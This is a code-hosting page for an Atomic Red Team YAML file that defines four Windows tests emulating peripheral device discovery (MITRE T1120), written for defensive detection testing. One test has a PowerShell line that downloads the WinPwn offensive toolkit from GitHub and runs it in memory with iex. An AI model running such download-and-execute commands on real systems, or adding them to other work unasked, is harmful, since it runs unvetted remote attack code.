security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
python_conversion
atomic-red-team/atomics/T1120/T1120.yaml
T
Hare Sudhan bfdd702717 Remove unused variable (#3040)
2025-01-28 00:02:41 -05:00

47 lines
2.0 KiB
YAML
Raw Permalink Blame History

attack_technique: T1120
display_name: Peripheral Device Discovery
atomic_tests:
- name: Win32_PnPEntity Hardware Inventory
auto_generated_guid: 2cb4dbf2-2dca-4597-8678-4d39d207a3a5
description: Perform peripheral device discovery using Get-WMIObject Win32_PnPEntity
supported_platforms:
- windows
executor:
command: |-
Get-WMIObject Win32_PnPEntity | Format-Table Name, Description, Manufacturer > $env:TEMP\T1120_collection.txt
$Space,$Heading,$Break,$Data = Get-Content $env:TEMP\T1120_collection.txt
@($Heading; $Break; $Data |Sort-Object -Unique) | ? {$_.trim() -ne "" } |Set-Content $env:TEMP\T1120_collection.txt
cleanup_command: Remove-Item $env:TEMP\T1120_collection.txt -ErrorAction Ignore
name: powershell
- name: WinPwn - printercheck
auto_generated_guid: cb6e76ca-861e-4a7f-be08-564caa3e6f75
description: Search for printers / potential vulns using printercheck function of WinPwn
supported_platforms:
- windows
executor:
command: |-
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
printercheck -noninteractive -consoleoutput
name: powershell
- name: Peripheral Device Discovery via fsutil
auto_generated_guid: 424e18fd-48b8-4201-8d3a-bf591523a686
description: Performs pheripheral device discovery utilizing fsutil to list all drives.
supported_platforms:
- windows
executor:
command: |-
fsutil fsinfo drives
name: command_prompt
- name: Get Printer Device List via PowerShell Command
auto_generated_guid: 5c876daf-db1e-41cf-988d-139a7443ccd4
description: |
This test uses PowerShell to list printers on a Windows system, demonstrating a discovery technique attackers might use to
gather details on connected devices. Using Get-Printer, they can view information on all available printers, identifying
potential devices for further targeting.
supported_platforms:
- windows
executor:
name: powershell
command: |
Get-Printer
Reference in New Issue View Git Blame Copy Permalink